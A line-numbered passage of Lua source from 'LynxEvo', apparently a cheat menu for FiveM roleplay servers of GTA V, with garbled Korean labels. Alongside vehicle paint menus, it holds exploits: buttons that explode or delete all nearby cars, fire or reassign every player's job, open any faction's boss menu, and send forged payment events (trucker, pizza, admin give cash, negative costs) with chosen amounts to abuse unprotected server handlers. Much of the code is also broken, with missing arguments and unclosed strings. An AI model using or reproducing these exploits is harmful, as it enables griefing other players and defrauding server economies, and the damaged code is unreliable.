  8686. SetVehicleColours(veh,, oldsec)
  8687. SetVehicleExtraColours(veh,, oldwheelcolour)
  8688. bg = true
  8689. end
  8690. end
  8691. end
  8692. LynxEvo.Display()
  8693. elseif LynxEvo.IsMenuOpened('metallic1') then
  8694. for dK, em in pairs(br) do
  8695. tp, ts = GetVehicleColours(veh)
  8696. if tp == and not bg then
  8697. pricetext = 'Installed'
  8698. else
  8699. if bg and tp == then
  8700. pricetext = 'Previewing'
  8701. else
  8702. pricetext = 'Not Installed'
  8703. end
  8704. end
  8705. curprim, cursec = GetVehicleColours(veh)
  8706. if LynxEvo.Button(, pricetext) then
  8707. if not bg then
  8708. bi = 'paint'
  8709. bk = false
  8710. oldprim, oldsec = GetVehicleColours(veh)
  8711. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  8712. bh = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  8713. SetVehicleColours(veh,, oldsec)
  8714. SetVehicleExtraColours(veh,, oldwheelcolour)
  8715. bg = true
  8716. elseif bg and curprim == then
  8717. SetVehicleColours(veh,, oldsec)
  8718. SetVehicleExtraColours(veh,, oldwheelcolour)
  8719. bg = false
  8720. bi = -1
  8721. bh = -1
  8722. elseif bg and curprim ~= then
  8723. SetVehicleColours(veh,, oldsec)
  8724. SetVehicleExtraColours(veh,, oldwheelcolour)
  8725. bg = true
  8726. end
  8727. end
  8728. end
  8729. LynxEvo.Display()
  8730. elseif LynxEvo.IsMenuOpened('matte1') then
  8731. for dK, em in pairs(bt) do
  8732. tp, ts = GetVehicleColours(veh)
  8733. if tp == and not bg then
  8734. pricetext = 'Installed'
  8735. else
  8736. if bg and tp == then
  8737. pricetext = 'Previewing'
  8738. else
  8739. pricetext = 'Not Installed'
  8740. end
  8741. end
  8742. curprim, cursec = GetVehicleColours(veh)
  8743. if LynxEvo.Button(, pricetext) then
  8744. if not bg then
  8745. bi = 'paint'
  8746. bk = false
  8747. oldprim, oldsec = GetVehicleColours(veh)
  8748. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  8749. SetVehicleExtraColours(veh,, oldwheelcolour)
  8750. bh = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  8751. SetVehicleColours(veh,, oldsec)
  8752. bg = true
  8753. elseif bg and curprim == then
  8754. SetVehicleColours(veh,, oldsec)
  8755. SetVehicleExtraColours(veh,, oldwheelcolour)
  8756. bg = false
  8757. bi = -1
  8758. bh = -1
  8759. elseif bg and curprim ~= then
  8760. SetVehicleColours(veh,, oldsec)
  8761. SetVehicleExtraColours(veh,, oldwheelcolour)
  8762. bg = true
  8763. end
  8764. end
  8765. end
  8766. LynxEvo.Display()
  8767. elseif LynxEvo.IsMenuOpened('metal1') then
  8768. for dK, em in pairs(bu) do
  8769. tp, ts = GetVehicleColours(veh)
  8770. if tp == and not bg then
  8771. pricetext = 'Installed'
  8772. else
  8773. if bg and tp == then
  8774. pricetext = 'Previewing'
  8775. else
  8776. pricetext = 'Not Installed'
  8777. end
  8778. end
  8779. curprim, cursec = GetVehicleColours(veh)
  8780. if LynxEvo.Button(, pricetext) then
  8781. if not bg then
  8782. bi = 'paint'
  8783. bk = false
  8784. oldprim, oldsec = GetVehicleColours(veh)
  8785. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  8786. bh = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  8787. SetVehicleExtraColours(veh,, oldwheelcolour)
  8788. SetVehicleColours(veh,, oldsec)
  8789. bg = true
  8790. elseif bg and curprim == then
  8791. SetVehicleColours(veh,, oldsec)
  8792. SetVehicleExtraColours(veh,, oldwheelcolour)
  8793. bg = false
  8794. bi = -1
  8795. bh = -1
  8796. elseif bg and curprim ~= then
  8797. SetVehicleColours(veh,, oldsec)
  8798. SetVehicleExtraColours(veh,, oldwheelcolour)
  8799. bg = true
  8800. end
  8801. end
  8802. end
  8803. LynxEvo.Display()
  8804. elseif LynxEvo.IsMenuOpened('classic2') then
  8805. for dK, em in pairs(br) do
  8806. tp, ts = GetVehicleColours(veh)
  8807. if ts == and not bg then
  8808. pricetext = 'Installed'
  8809. else
  8810. if bg and ts == then
  8811. pricetext = 'Previewing'
  8812. else
  8813. pricetext = 'Not Installed'
  8814. end
  8815. end
  8816. curprim, cursec = GetVehicleColours(veh)
  8817. if LynxEvo.Button(, pricetext) then
  8818. if not bg then
  8819. bi = 'paint'
  8820. bk = false
  8821. oldprim, oldsec = GetVehicleColours(veh)
  8822. bh = table.pack(oldprim, oldsec)
  8823. SetVehicleColours(veh, oldprim,
  8824. bg = true
  8825. elseif bg and cursec == then
  8826. SetVehicleColours(veh, oldprim,
  8827. bg = false
  8828. bi = -1
  8829. bh = -1
  8830. elseif bg and cursec ~= then
  8831. SetVehicleColours(veh, oldprim,
  8832. bg = true
  8833. end
  8834. end
  8835. end
  8836. LynxEvo.Display()
  8837. elseif LynxEvo.IsMenuOpened('metallic2') then
  8838. for dK, em in pairs(br) do
  8839. tp, ts = GetVehicleColours(veh)
  8840. if ts == and not bg then
  8841. pricetext = 'Installed'
  8842. else
  8843. if bg and ts == then
  8844. pricetext = 'Previewing'
  8845. else
  8846. pricetext = 'Not Installed'
  8847. end
  8848. end
  8849. curprim, cursec = GetVehicleColours(veh)
  8850. if LynxEvo.Button(, pricetext) then
  8851. if not bg then
  8852. bi = 'paint'
  8853. bk = false
  8854. oldprim, oldsec = GetVehicleColours(veh)
  8855. bh = table.pack(oldprim, oldsec)
  8856. SetVehicleColours(veh, oldprim,
  8857. bg = true
  8858. elseif bg and cursec == then
  8859. SetVehicleColours(veh, oldprim,
  8860. bg = false
  8861. bi = -1
  8862. bh = -1
  8863. elseif bg and cursec ~= then
  8864. SetVehicleColours(veh, oldprim,
  8865. bg = true
  8866. end
  8867. end
  8868. end
  8869. LynxEvo.Display()
  8870. elseif LynxEvo.IsMenuOpened('matte2') then
  8871. for dK, em in pairs(bt) do
  8872. tp, ts = GetVehicleColours(veh)
  8873. if ts == and not bg then
  8874. pricetext = 'Installed'
  8875. else
  8876. if bg and ts == then
  8877. pricetext = 'Previewing'
  8878. else
  8879. pricetext = 'Not Installed'
  8880. end
  8881. end
  8882. curprim, cursec = GetVehicleColours(veh)
  8883. if LynxEvo.Button(, pricetext) then
  8884. if not bg then
  8885. bi = 'paint'
  8886. bk = false
  8887. oldprim, oldsec = GetVehicleColours(veh)
  8888. bh = table.pack(oldprim, oldsec)
  8889. SetVehicleColours(veh, oldprim,
  8890. bg = true
  8891. elseif bg and cursec == then
  8892. SetVehicleColours(veh, oldprim,
  8893. bg = false
  8894. bi = -1
  8895. bh = -1
  8896. elseif bg and cursec ~= then
  8897. SetVehicleColours(veh, oldprim,
  8898. bg = true
  8899. end
  8900. end
  8901. end
  8902. LynxEvo.Display()
  8903. elseif LynxEvo.IsMenuOpened('metal2') then
  8904. for dK, em in pairs(bu) do
  8905. tp, ts = GetVehicleColours(veh)
  8906. if ts == and not bg then
  8907. pricetext = 'Installed'
  8908. else
  8909. if bg and ts == then
  8910. pricetext = 'Previewing'
  8911. else
  8912. pricetext = 'Not Installed'
  8913. end
  8914. end
  8915. curprim, cursec = GetVehicleColours(veh)
  8916. if LynxEvo.Button(, pricetext) then
  8917. if not bg then
  8918. bi = 'paint'
  8919. bk = false
  8920. oldprim, oldsec = GetVehicleColours(veh)
  8921. bh = table.pack(oldprim, oldsec)
  8922. SetVehicleColours(veh, oldprim,
  8923. bg = true
  8924. elseif bg and cursec == then
  8925. SetVehicleColours(veh, oldprim,
  8926. bg = false
  8927. bi = -1
  8928. bh = -1
  8929. elseif bg and cursec ~= then
  8930. SetVehicleColours(veh, oldprim,
  8931. bg = true
  8932. end
  8933. end
  8934. end
  8935. LynxEvo.Display()
  8936. elseif LynxEvo.IsMenuOpened('classic3') then
  8937. for dK, em in pairs(br) do
  8938. _, ts = GetVehicleExtraColours(veh)
  8939. if ts == and not bg then
  8940. pricetext = 'Installed'
  8941. else
  8942. if bg and ts == then
  8943. pricetext = 'Previewing'
  8944. else
  8945. pricetext = 'Not Installed'
  8946. end
  8947. end
  8948. _, currims = GetVehicleExtraColours(veh)
  8949. if LynxEvo.Button(, pricetext) then
  8950. if not bg then
  8951. bi = 'paint'
  8952. bk = false
  8953. oldprim, oldsec = GetVehicleColours(veh)
  8954. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  8955. bh = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  8956. SetVehicleExtraColours(veh, oldpearl,
  8957. bg = true
  8958. elseif bg and currims == then
  8959. SetVehicleExtraColours(veh, oldpearl,
  8960. bg = false
  8961. bi = -1
  8962. bh = -1
  8963. elseif bg and currims ~= then
  8964. SetVehicleExtraColours(veh, oldpearl,
  8965. bg = true
  8966. end
  8967. end
  8968. end
  8969. LynxEvo.Display()
  8970. elseif LynxEvo.IsMenuOpened('metallic3') then
  8971. for dK, em in pairs(br) do
  8972. _, ts = GetVehicleExtraColours(veh)
  8973. if ts == and not bg then
  8974. pricetext = 'Installed'
  8975. else
  8976. if bg and ts == then
  8977. pricetext = 'Previewing'
  8978. else
  8979. pricetext = 'Not Installed'
  8980. end
  8981. end
  8982. _, currims = GetVehicleExtraColours(veh)
  8983. if LynxEvo.Button(, pricetext) then
  8984. if not bg then
  8985. bi = 'paint'
  8986. bk = false
  8987. oldprim, oldsec = GetVehicleColours(veh)
  8988. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  8989. bh = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  8990. SetVehicleExtraColours(veh, oldpearl,
  8991. bg = true
  8992. elseif bg and currims == then
  8993. SetVehicleExtraColours(veh, oldpearl,
  8994. bg = false
  8995. bi = -1
  8996. bh = -1
  8997. elseif bg and currims ~= then
  8998. SetVehicleExtraColours(veh, oldpearl,
  8999. bg = true
  9000. end
  9001. end
  9002. end
  9003. LynxEvo.Display()
  9004. elseif LynxEvo.IsMenuOpened('matte3') then
  9005. for dK, em in pairs(bt) do
  9006. _, ts = GetVehicleExtraColours(veh)
  9007. if ts == and not bg then
  9008. pricetext = 'Installed'
  9009. else
  9010. if bg and ts == then
  9011. pricetext = 'Previewing'
  9012. else
  9013. pricetext = 'Not Installed'
  9014. end
  9015. end
  9016. _, currims = GetVehicleExtraColours(veh)
  9017. if LynxEvo.Button(, pricetext) then
  9018. if not bg then
  9019. bi = 'paint'
  9020. bk = false
  9021. oldprim, oldsec = GetVehicleColours(veh)
  9022. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  9023. bh = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  9024. SetVehicleExtraColours(veh, oldpearl,
  9025. bg = true
  9026. elseif bg and currims == then
  9027. SetVehicleExtraColours(veh, oldpearl,
  9028. bg = false
  9029. bi = -1
  9030. bh = -1
  9031. elseif bg and currims ~= then
  9032. SetVehicleExtraColours(veh, oldpearl,
  9033. bg = true
  9034. end
  9035. end
  9036. end
  9037. LynxEvo.Display()
  9038. elseif LynxEvo.IsMenuOpened('metal3') then
  9039. for dK, em in pairs(bu) do
  9040. _, ts = GetVehicleExtraColours(veh)
  9041. if ts == and not bg then
  9042. pricetext = 'Installed'
  9043. else
  9044. if bg and ts == then
  9045. pricetext = 'Previewing'
  9046. else
  9047. pricetext = 'Not Installed'
  9048. end
  9049. end
  9050. _, currims = GetVehicleExtraColours(veh)
  9051. if LynxEvo.Button(, pricetext) then
  9052. if not bg then
  9053. bi = 'paint'
  9054. bk = false
  9055. oldprim, oldsec = GetVehicleColours(veh)
  9056. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  9057. bh = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  9058. SetVehicleExtraColours(veh, oldpearl,
  9059. bg = true
  9060. elseif bg and currims == then
  9061. SetVehicleExtraColours(veh, oldpearl,
  9062. bg = false
  9063. bi = -1
  9064. bh = -1
  9065. elseif bg and currims ~= then
  9066. SetVehicleExtraColours(veh, oldpearl,
  9067. bg = true
  9068. end
  9069. end
  9070. end
  9071. LynxEvo.Display()
  9072. elseif LynxEvo.IsMenuOpened('李⑤웾 硫붾돱') then
  9073. if LynxEvo.MenuButton('~h~~p~#~s~ ~h~~b~濡쒖뒪?고넗??~s~?쒕떇??, '濡쒖뒪?고넗??) then
  9074. elseif LynxEvo.MenuButton('~h~~p~#~s~ 李⑤웾 ~g~遺€?ㅽ듃', 'BoostMenu') then
  9075. elseif LynxEvo.MenuButton('~h~~p~#~s~ 李⑤웾紐⑸줉', 'CarTypes') then
  9076. elseif LynxEvo.MenuButton('~h~~p~#~s~ ?꾩껜李⑤웾 ?몃·', 'GCT') then
  9077. elseif LynxEvo.MenuButton('~h~~p~#~s~ ?몃윮 遺€李??몃젅?쇰윭 ?뚰솚', 'MainTrailer') then
  9078. elseif LynxEvo.Button('~h~~s~李⑤웾 ~r~?뚰솚') then
  9079. ca()
  9080. elseif LynxEvo.Button('~h~~s~李⑤웾 ~r~??젣') then
  9081. DelVeh(GetVehiclePedIsUsing(PlayerPedId(-1)))
  9082. elseif LynxEvo.Button('~h~~s~李⑤웾 ~g~?섎━') then
  9083. cc()
  9084. elseif LynxEvo.Button('~h~~s~?붿쭊 ~g~?섎━') then
  9085. cd()
  9086. elseif LynxEvo.Button('~h~~s~李⑤웾 ~g~?ㅼ쭛湲?) then
  9087. daojosdinpatpemata()
  9088. elseif LynxEvo.Button('~h~~s~李⑤웾 ~b~?€ ~s~?쒕떇') then
  9089. MaxOut(GetVehiclePedIsUsing(PlayerPedId(-1)))
  9090. elseif LynxEvo.Button('~h~~g~RC ~s~移?) then
  9091. ce()
  9092. LynxEvo.CloseMenu()
  9093. elseif
  9094. LynxEvo.CheckBox(
  9095. '~h~?섏뼱吏€吏€ ?딆쓬',
  9096. Nofall,
  9097. function(dR)
  9098. Nofall = dR
  9099. SetPedCanBeKnockedOffVehicle(PlayerPedId(-1), Nofall)
  9100. end
  9101. )
  9102. then
  9103. elseif
  9104. LynxEvo.CheckBox(
  9105. '~h~李⑤웾 ~g~臾댁쟻',
  9106. VehGod,
  9107. function(dR)
  9108. VehGod = dR
  9109. end
  9110. )
  9111. then
  9112. elseif
  9113. LynxEvo.CheckBox(
  9114. '~h~遺€?ㅽ꽣 ~s~媛€??~g~SHIFT ~s~媛먯냽:~r~CTRL',
  9115. VehSpeed,
  9116. function(dR)
  9117. VehSpeed = dR
  9118. end
  9119. )
  9120. then
  9121. end
  9122. LynxEvo.Display()
  9123. elseif LynxEvo.IsMenuOpened('GCT') then
  9124. if
  9125. LynxEvo.CheckBox(
  9126. '~h~~s~二쇰?李⑤웾 ~r~EMP',
  9127. destroyvehicles,
  9128. function(dR)
  9129. destroyvehicles = dR
  9130. end
  9131. )
  9132. then
  9133. elseif
  9134. LynxEvo.CheckBox(
  9135. '~h~~s~二쇰?李⑤웾/鍮?李?~r~??젣',
  9136. deletenearestvehicle,
  9137. function(dR)
  9138. deletenearestvehicle = dR
  9139. end
  9140. )
  9141. then
  9142. elseif
  9143. LynxEvo.CheckBox(
  9144. '~h~~s~二쇰?李⑤웾 ~r~??컻',
  9145. explodevehicles,
  9146. function(dR)
  9147. explodevehicles = dR
  9148. end
  9149. )
  9150. then
  9151. elseif
  9152. LynxEvo.CheckBox(
  9153. '~h~~s~二쇰?李⑤웾 ~p~FUCK ',
  9154. fuckallcars,
  9155. function(dR)
  9156. fuckallcars = dR
  9157. end
  9158. )
  9159. then
  9160. end
  9161. LynxEvo.Display()
  9162. elseif LynxEvo.IsMenuOpened('猷⑥븘 硫붾돱') then
  9163. if LynxEvo.MenuButton('~h~~p~#~s~ ~r~ESX ~s~Boss', 'ESXBoss') then
  9164. elseif LynxEvo.MenuButton('~h~~p~#~s~ ~r~ESX ~s~??紐낅졊??, 'ESXMoney') then
  9165. elseif LynxEvo.MenuButton('~h~~p~#~s~ ~r~ESX ~s~吏곸뾽 紐낅졊??, 'ESXJobs') then
  9166. elseif LynxEvo.MenuButton('~h~~p~#~s~ ~r~ESX ~s~湲고? 紐낅졊??, 'ESXCustom') then
  9167. elseif LynxEvo.MenuButton('~h~~p~#~s~ ~r~ESX ~s~留덉빟 紐낅졊??, 'ESXDrugs') then
  9168. elseif LynxEvo.MenuButton('~h~~p~#~s~ ~y~VRP ~s~紐낅졊??, 'VRPTriggers') then
  9169. elseif LynxEvo.MenuButton('~h~~p~#~s~ ~b~湲고? ~s~紐낅졊??, 'MiscTriggers') then
  9170. end
  9171. LynxEvo.Display()
  9172. elseif LynxEvo.IsMenuOpened('ESXJobs') then
  9173. if LynxEvo.Button('~h~Fire all players') then
  9174. for ak = 0, 128 do
  9175. TriggerServerEvent('NB:destituerplayer', GetPlayerServerId(ak))
  9176. UnemployedPlayers()
  9177. end
  9178. elseif LynxEvo.Button('~h~Set all ~b~Police ~s~Job') then
  9179. for ak = 0, 128 do
  9180. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(ak), 'police', 3)
  9181. PolicePlayers()
  9182. end
  9183. elseif LynxEvo.Button('~h~Set all ~o~Mecano ~s~Job') then
  9184. for ak = 0, 128 do
  9185. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(ak), 'mecano', 3)
  9186. MecanoPlayers()
  9187. end
  9188. elseif LynxEvo.Button('~h~Set all ~y~Taxi ~s~Job') then
  9189. for ak = 0, 128 do
  9190. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(ak), 'taxi', 3)
  9191. TaxiPlayers()
  9192. end
  9193. elseif LynxEvo.Button('~h~Set all ~r~Ambulance ~s~Job') then
  9194. for ak = 0, 128 do
  9195. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(ak), 'ambulance', 3)
  9196. AmbulancePlayers()
  9197. end
  9198. elseif LynxEvo.Button('~h~Set all ~g~Real Estate ~s~Job') then
  9199. for ak = 0, 128 do
  9200. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(ak), 'realestateagent', 3)
  9201. RealEstateAgentPlayers()
  9202. end
  9203. elseif LynxEvo.Button('~h~Set all ~r~Car ~b~Dealer ~s~Job') then
  9204. for ak = 0, 128 do
  9205. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(ak), 'cardealer', 3)
  9206. CarDealerPlayers()
  9207. end
  9208. end
  9209. LynxEvo.Display()
  9210. elseif LynxEvo.IsMenuOpened('ESXBoss') then
  9211. if LynxEvo.Button('~c~~h~Mechanic~s~ Boss Menu') then
  9212. TriggerEvent(
  9213. 'esx_society:openBossMenu',
  9214. 'mecano',
  9215. function(en, eo)
  9216. eo.close()
  9217. end
  9218. )
  9219. TriggerEvent(
  9220. 'esx_society:openBossMenu',
  9221. 'mecano',
  9222. function(en, eo)
  9223. eo.close()
  9224. end
  9225. )
  9226. TriggerEvent(
  9227. 'esx_society:openBossMenu',
  9228. 'mecano',
  9229. function(ep, eq)
  9230. eq.close()
  9231. end
  9232. )
  9233. TriggerEvent(
  9234. 'esx_society:openBossMenu',
  9235. 'mecano',
  9236. function(ep, eq)
  9237. eq.close()
  9238. end
  9239. )
  9240. TriggerEvent(
  9241. 'esx_society:openBossMenu',
  9242. 'mecano',
  9243. function(er, es)
  9244. es.close()
  9245. end
  9246. )
  9247. TriggerEvent(
  9248. 'esx_society:openBossMenu',
  9249. 'mecano',
  9250. function(er, es)
  9251. es.close()
  9252. end
  9253. )
  9254. LynxEvo.CloseMenu()
  9255. elseif LynxEvo.Button('~b~~h~Police~s~ Boss Menu') then
  9256. TriggerEvent(
  9257. 'esx_society:openBossMenu',
  9258. 'police',
  9259. function(en, eo)
  9260. eo.close()
  9261. end
  9262. )
  9263. TriggerEvent(
  9264. 'esx_society:openBossMenu',
  9265. 'police',
  9266. function(en, eo)
  9267. eo.close()
  9268. end
  9269. )
  9270. TriggerEvent(
  9271. 'esx_society:openBossMenu',
  9272. 'police',
  9273. function(ep, eq)
  9274. eq.close()
  9275. end
  9276. )
  9277. TriggerEvent(
  9278. 'esx_society:openBossMenu',
  9279. 'police',
  9280. function(ep, eq)
  9281. eq.close()
  9282. end
  9283. )
  9284. TriggerEvent(
  9285. 'esx_society:openBossMenu',
  9286. 'police',
  9287. function(er, es)
  9288. es.close()
  9289. end
  9290. )
  9291. TriggerEvent(
  9292. 'esx_society:openBossMenu',
  9293. 'police',
  9294. function(er, es)
  9295. es.close()
  9296. end
  9297. )
  9298. LynxEvo.CloseMenu()
  9299. elseif LynxEvo.Button('~r~~h~Ambulance~s~ Boss Menu') then
  9300. TriggerEvent(
  9301. 'esx_society:openBossMenu',
  9302. 'ambulance',
  9303. function(en, eo)
  9304. eo.close()
  9305. end
  9306. )
  9307. TriggerEvent(
  9308. 'esx_society:openBossMenu',
  9309. 'ambulance',
  9310. function(en, eo)
  9311. eo.close()
  9312. end
  9313. )
  9314. TriggerEvent(
  9315. 'esx_society:openBossMenu',
  9316. 'ambulance',
  9317. function(ep, eq)
  9318. eq.close()
  9319. end
  9320. )
  9321. TriggerEvent(
  9322. 'esx_society:openBossMenu',
  9323. 'ambulance',
  9324. function(ep, eq)
  9325. eq.close()
  9326. end
  9327. )
  9328. TriggerEvent(
  9329. 'esx_society:openBossMenu',
  9330. 'ambulance',
  9331. function(er, es)
  9332. es.close()
  9333. end
  9334. )
  9335. TriggerEvent(
  9336. 'esx_society:openBossMenu',
  9337. 'ambulance',
  9338. function(er, es)
  9339. es.close()
  9340. end
  9341. )
  9342. LynxEvo.CloseMenu()
  9343. elseif LynxEvo.Button('~y~~h~Taxi~s~ Boss Menu') then
  9344. TriggerEvent(
  9345. 'esx_society:openBossMenu',
  9346. 'taxi',
  9347. function(en, eo)
  9348. eo.close()
  9349. end
  9350. )
  9351. TriggerEvent(
  9352. 'esx_society:openBossMenu',
  9353. 'taxi',
  9354. function(en, eo)
  9355. eo.close()
  9356. end
  9357. )
  9358. TriggerEvent(
  9359. 'esx_society:openBossMenu',
  9360. 'taxi',
  9361. function(ep, eq)
  9362. eq.close()
  9363. end
  9364. )
  9365. TriggerEvent(
  9366. 'esx_society:openBossMenu',
  9367. 'taxi',
  9368. function(ep, eq)
  9369. eq.close()
  9370. end
  9371. )
  9372. TriggerEvent(
  9373. 'esx_society:openBossMenu',
  9374. 'taxi',
  9375. function(er, es)
  9376. es.close()
  9377. end
  9378. )
  9379. TriggerEvent(
  9380. 'esx_society:openBossMenu',
  9381. 'taxi',
  9382. function(er, es)
  9383. es.close()
  9384. end
  9385. )
  9386. LynxEvo.CloseMenu()
  9387. elseif LynxEvo.Button('~g~~h~Real Estate~s~ Boss Menu') then
  9388. TriggerEvent(
  9389. 'esx_society:openBossMenu',
  9390. 'realestateagent',
  9391. function(en, eo)
  9392. LynxEvo.close()
  9393. end
  9394. )
  9395. TriggerEvent(
  9396. 'esx_society:openBossMenu',
  9397. 'realestateagent',
  9398. function(en, eo)
  9399. LynxEvo.close()
  9400. end
  9401. )
  9402. TriggerEvent(
  9403. 'esx_society:openBossMenu',
  9404. 'realestateagent',
  9405. function(ep, eq)
  9406. eq.close()
  9407. end
  9408. )
  9409. TriggerEvent(
  9410. 'esx_society:openBossMenu',
  9411. 'realestateagent',
  9412. function(ep, eq)
  9413. eq.close()
  9414. end
  9415. )
  9416. TriggerEvent(
  9417. 'esx_society:openBossMenu',
  9418. 'realestateagent',
  9419. function(er, es)
  9420. es.close()
  9421. end
  9422. )
  9423. TriggerEvent(
  9424. 'esx_society:openBossMenu',
  9425. 'realestateagent',
  9426. function(er, es)
  9427. es.close()
  9428. end
  9429. )
  9430. LynxEvo.CloseMenu()
  9431. elseif LynxEvo.Button('~o~~h~Car Dealer~s~ Boss Menu') then
  9432. TriggerEvent(
  9433. 'esx_society:openBossMenu',
  9434. 'cardealer',
  9435. function(en, eo)
  9436. LynxEvo.close()
  9437. end
  9438. )
  9439. TriggerEvent(
  9440. 'esx_society:openBossMenu',
  9441. 'cardealer',
  9442. function(en, eo)
  9443. LynxEvo.close()
  9444. end
  9445. )
  9446. TriggerEvent(
  9447. 'esx_society:openBossMenu',
  9448. 'cardealer',
  9449. function(ep, eq)
  9450. eq.close()
  9451. end
  9452. )
  9453. TriggerEvent(
  9454. 'esx_society:openBossMenu',
  9455. 'cardealer',
  9456. function(ep, eq)
  9457. eq.close()
  9458. end
  9459. )
  9460. TriggerEvent(
  9461. 'esx_society:openBossMenu',
  9462. 'cardealer',
  9463. function(er, es)
  9464. es.close()
  9465. end
  9466. )
  9467. TriggerEvent(
  9468. 'esx_society:openBossMenu',
  9469. 'cardealer',
  9470. function(er, es)
  9471. es.close()
  9472. end
  9473. )
  9474. LynxEvo.CloseMenu()
  9475. elseif LynxEvo.Button('~y~~h~Custom~s~ Boss Menu') then
  9476. local m = KeyboardInput('Enter custom boss menu job name', '', 100)
  9477. if m ~= '' then
  9478. TriggerEvent(
  9479. 'esx_society:openBossMenu',
  9480. m,
  9481. function(en, eo)
  9482. LynxEvo.close()
  9483. end
  9484. )
  9485. TriggerEvent(
  9486. 'esx_society:openBossMenu',
  9487. m,
  9488. function(ep, eq)
  9489. eq.close()
  9490. end
  9491. )
  9492. TriggerEvent(
  9493. 'esx_society:openBossMenu',
  9494. m,
  9495. function(er, es)
  9496. es.close()
  9497. end
  9498. )
  9499. LynxEvo.CloseMenu()
  9500. end
  9501. end
  9502. LynxEvo.Display()
  9503. elseif LynxEvo.IsMenuOpened('ESXMoney') then
  9504. if LynxEvo.Button('~h~~o~Automatic Money ~r~ WARNING!') then
  9505. automaticmoneyesx()
  9506. elseif LynxEvo.Button('~g~~h~ESX ~y~Caution Give Back') then
  9507. local m = KeyboardInput('Enter amount of money', '', 100)
  9508. if m ~= '' then
  9509. TriggerServerEvent('esx_jobs:caution', 'give_back', m)
  9510. end
  9511. elseif LynxEvo.Button('~g~~h~ESX ~y~?몃윮湲곗궗 蹂댁닔諛쏄린 ~y~by-?≫뙜??) then -- ?몃윮湲곗궗
  9512. local m = KeyboardInput('諛쏄퀬 ?띠? 湲덉븸 by-?≫뙜??, '', 100)
  9513. if m ~= '' then
  9514. TriggerServerEvent('truckerJob:success', m)
  9515. end
  9516. elseif LynxEvo.Button('~g~~h~ESX ~y~Eden Garage') then
  9517. local m = KeyboardInput('Enter amount of money', '', 100)
  9518. if m ~= '' then
  9519. TriggerServerEvent(
  9520. 'eden_garage:payhealth',
  9521. {
  9522. costs = -m
  9523. }
  9524. )
  9525. end
  9526. elseif LynxEvo.Button('~g~~h~ESX ~y~Fuel Delivery') then
  9527. local m = KeyboardInput('Enter amount of money', '', 100)
  9528. if m ~= '' then
  9529. TriggerServerEvent('esx_fueldelivery:pay', m)
  9530. end
  9531. elseif LynxEvo.Button('~g~~h~ESX ~y~Car Thief') then
  9532. local m = KeyboardInput('Enter amount of money', '', 100)
  9533. if m ~= '' then
  9534. TriggerServerEvent('esx_carthief:pay', m)
  9535. end
  9536. elseif LynxEvo.Button('~g~~h~ESX ~y~DMV School') then
  9537. local m = KeyboardInput('Enter amount of money', '', 100)
  9538. if m ~= '' then
  9539. TriggerServerEvent(
  9540. 'esx_dmvschool:pay',
  9541. {
  9542. costs = -m
  9543. }
  9544. )
  9545. end
  9546. elseif LynxEvo.Button('~g~~h~FUEL ~y~Legacy Fuel') then
  9547. local m = KeyboardInput('Enter amount of money', '', 100)
  9548. if m ~= '' then
  9549. TriggerServerEvent(
  9550. 'LegacyFuel:PayFuel',
  9551. {
  9552. costs = -m
  9553. }
  9554. )
  9555. end
  9556. elseif LynxEvo.Button('~g~~h~ESX ~y~Dirty Job') then
  9557. local m = KeyboardInput('Enter amount of money', '', 100)
  9558. if m ~= '' then
  9559. TriggerServerEvent('esx_godirtyjob:pay', m)
  9560. end
  9561. elseif LynxEvo.Button('~g~~h~ESX ~y~Pizza Boy') then
  9562. local m = KeyboardInput('Enter amount of money', '', 100)
  9563. if m ~= '' then
  9564. TriggerServerEvent('esx_pizza:pay', m)
  9565. end
  9566. elseif LynxEvo.Button('~g~~h~ESX ~y~Ranger Job') then
  9567. local m = KeyboardInput('Enter amount of money', '', 100)
  9568. if m ~= '' then
  9569. TriggerServerEvent('esx_ranger:pay', m)
  9570. end
  9571. elseif LynxEvo.Button('~g~~h~ESX ~y~Garbage Job') then
  9572. local m = KeyboardInput('Enter amount of money', '', 100)
  9573. if m ~= '' then
  9574. TriggerServerEvent('esx_garbagejob:pay', m)
  9575. end
  9576. elseif LynxEvo.Button('~g~~h~ESX ~y~Car Thief ~r~DIRTY MONEY') then
  9577. local m = KeyboardInput('Enter amount of dirty money', '', 100)
  9578. if m ~= '' then
  9579. TriggerServerEvent('esx_carthief:pay', m)
  9580. end
  9581. elseif LynxEvo.Button('~g~~h~ESX ~y~Trucker Job') then
  9582. local m = KeyboardInput('Enter amount of money', '', 100)
  9583. if m ~= '' then
  9584. TriggerServerEvent('esx_truckerjob:pay', m)
  9585. end
  9586. elseif LynxEvo.Button('~g~~h~ESX ~y~Admin Give Bank') then
  9587. local m = KeyboardInput('Enter amount of money', '', 100)
  9588. if m ~= '' then
  9589. TriggerServerEvent('AdminMenu:giveBank', m)
  9590. end
  9591. elseif LynxEvo.Button('~g~~h~ESX ~y~Admin Give Cash') then
  9592. local m = KeyboardInput('Enter amount of money', '', 100)
  9593. if m ~= '' then
  9594. TriggerServerEvent('AdminMenu:giveCash', m)
  9595. end
  9596. elseif LynxEvo.Button('~g~~h~ESX ~y~Postal Job') then
  9597. local m = KeyboardInput('Enter amount of money', '', 100)
  9598. if m ~= '' then
  9599. TriggerServerEvent('esx_gopostaljob:pay', m)
  9600. end
  9601. elseif LynxEvo.Button('~g~~h~ESX ~y~Banker Job') then
  9602. local m = KeyboardInput('Enter amount of money', '', 100)
  9603. if m ~= '' then
  9604. TriggerServerEvent('esx_banksecurity:pay', m)
  9605. end
